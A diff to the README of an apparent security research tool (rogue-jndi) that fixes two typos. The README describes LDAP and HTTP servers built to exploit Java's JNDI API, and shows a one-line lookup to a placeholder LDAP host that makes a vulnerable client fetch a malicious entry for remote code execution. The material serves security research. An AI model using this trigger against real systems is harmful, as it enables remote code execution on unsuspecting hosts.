veracode-research/rogue-jndi/README.md

 ### Description
-The project contains LDAP & HTTP servers for exploiting insecure-by-default Java JNDI API.<br> In order to perform an attack, you can start these servers localy and then trigger a JNDI resolution on the vulnerable client, e.g.:
+The project contains LDAP & HTTP servers for exploiting insecure-by-default Java JNDI API.<br> In order to perform an attack, you can start these servers locally and then trigger a JNDI resolution on the vulnerable client, e.g.:
 ```java
 InitialContext.lookup("ldap://your_server.com:1389/o=reference");
 ```
-It will initiate a connection from the vulnerable clinet to the local LDAP server.
+It will initiate a connection from the vulnerable client to the local LDAP server.
 Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution.

 ### Motivation